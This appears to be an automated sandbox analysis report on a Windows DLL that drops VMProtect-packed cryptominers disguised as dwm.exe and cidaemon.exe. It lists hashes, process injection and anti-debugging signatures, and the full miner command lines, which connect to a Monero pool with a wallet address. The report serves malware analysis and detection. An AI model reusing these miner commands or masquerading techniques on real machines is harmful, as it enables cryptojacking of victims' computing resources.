Analysis
-
max time kernel
151s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2022 07:59
Static task
static1
Behavioral task
behavioral1
Sample
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
Resource
win10v2004-20220901-en
General
-
Target
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
-
Size
4.6MB
-
MD5
f42201e1867d4b345373296577d40035
-
SHA1
b691363aa20b1d7681c7557a6aa40f3596416555
-
SHA256
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea
-
SHA512
4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6
-
SSDEEP
98304:4STCsrzPn/z33xlGTvgLkbYWtYAMrbL3uxEqO0c5l:4SpzP/z378vokb8AMrbL+xEj0cT
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
dwm.execidaemon.exepid process 2140 dwm.exe 4416 cidaemon.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect behavioral2/memory/4416-139-0x00007FF613CA0000-0x00007FF61406F000-memory.dmp vmprotect behavioral2/memory/2140-140-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect behavioral2/memory/2140-143-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp vmprotect behavioral2/memory/2140-144-0x00007FF7573D0000-0x00007FF75777D000-memory.dmp vmprotect -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
dwm.exepid process 2140 dwm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepid process 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe 4844 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
dwm.exedescription pid process Token: SeLockMemoryPrivilege 2140 dwm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
rundll32.exepid process 4844 rundll32.exe 4844 rundll32.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 4944 wrote to memory of 4844 4944 rundll32.exe rundll32.exe PID 4944 wrote to memory of 4844 4944 rundll32.exe rundll32.exe PID 4944 wrote to memory of 4844 4944 rundll32.exe rundll32.exe PID 4844 wrote to memory of 2140 4844 rundll32.exe dwm.exe PID 4844 wrote to memory of 2140 4844 rundll32.exe dwm.exe PID 4844 wrote to memory of 4416 4844 rundll32.exe cidaemon.exe PID 4844 wrote to memory of 4416 4844 rundll32.exe cidaemon.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll,#12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeC:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.23⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exeC:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.33⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exeFilesize
1.6MB
MD569e6e75f2219d64f3c776d2ef313b9ff
SHA1211042ac764db953ca0c54117aff8e241d86e4fe
SHA25609bb784499c13f9a43548d0e660ba4e5f009f06f5d5da5d57d11a1b4aceb1f8a
SHA512fa77b1bcc58d150df3e68fc64373302f71e2abcc058e0f6a1e29cfa44336146d8aa299c54bbc77e2ff877f0179a4429dcf01b841ede0379a8c7236fbab820410
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exeFilesize
1.6MB
MD569e6e75f2219d64f3c776d2ef313b9ff
SHA1211042ac764db953ca0c54117aff8e241d86e4fe
SHA25609bb784499c13f9a43548d0e660ba4e5f009f06f5d5da5d57d11a1b4aceb1f8a
SHA512fa77b1bcc58d150df3e68fc64373302f71e2abcc058e0f6a1e29cfa44336146d8aa299c54bbc77e2ff877f0179a4429dcf01b841ede0379a8c7236fbab820410
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
memory/2140-133-0x0000000000000000-mapping.dmp
-
memory/2140-140-0x00007FF7573D0000-0x00007FF75777D000-memory.dmpFilesize
3.7MB
-
memory/2140-143-0x00007FF7573D0000-0x00007FF75777D000-memory.dmpFilesize
3.7MB
-
memory/2140-144-0x00007FF7573D0000-0x00007FF75777D000-memory.dmpFilesize
3.7MB
-
memory/4416-139-0x00007FF613CA0000-0x00007FF61406F000-memory.dmpFilesize
3.8MB
-
memory/4416-135-0x0000000000000000-mapping.dmp
-
memory/4844-132-0x0000000000000000-mapping.dmp